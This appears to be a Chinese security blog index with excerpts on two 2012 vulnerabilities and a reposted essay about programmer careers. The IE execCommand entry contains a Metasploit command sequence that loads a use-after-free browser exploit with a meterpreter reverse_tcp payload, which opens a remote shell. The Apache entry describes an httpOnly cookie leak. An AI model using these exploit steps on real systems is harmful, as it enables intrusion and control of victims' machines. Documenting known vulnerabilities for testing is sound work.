IE execCommand函数的远程代码执行0day

CVE-2012-4969

描述:

mshtml.dll中的CMshtmlEd::Exec函数释放后重用,导致远程代码执行。远程攻击者可以通过一个精心制作的网站执行特定代码。于2012年9月被广泛利用。

受影响的IE版本:IE6、IE7、IE8、IE9

MSF 测试 :

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

Continue reading “IE execCommand函数的远程代码执行0day”

Apache HTTP Server httpOnly Cookie信息泄露漏洞

CVE-2012-0053

描述:

Apache HTTP Server 2.2.x 至 2.2.21 在建立 Bad Request (即400)错误文档时没有适当过滤请求头信息。远程攻击者可能构造页面发送含有超长(超过4K)或者含有缺陷的请求头来获取HTTPOnly Cookie的值。
受影响的Apache版本: 2.2.21- 2.2.0

现象:

Bad Request
Your browser sent a request that this server could not understand.
Size of a request header field exceeds server limit.
Cookie: z9=AAAAAAAAAAAAAAA.......

Continue reading “Apache HTTP Server httpOnly Cookie信息泄露漏洞”

为什么程序员难晋升?

转载 – 原文作者/梁斌

这个世界上有一类人特别苦逼,苦逼到什么程度呢?他们省吃俭用攒钱买房,结果房价越来越贵;公司外部竞争激烈,他们工作异常繁忙,披星戴月,日复一日;技 术更新行业罕见,他们要随时调整心情,随时学习知识;他们长期和机器为伍,大多比较呆傻,比较单纯;还有很多不一一例举,这一类人就是程序员。
Continue reading “为什么程序员难晋升?”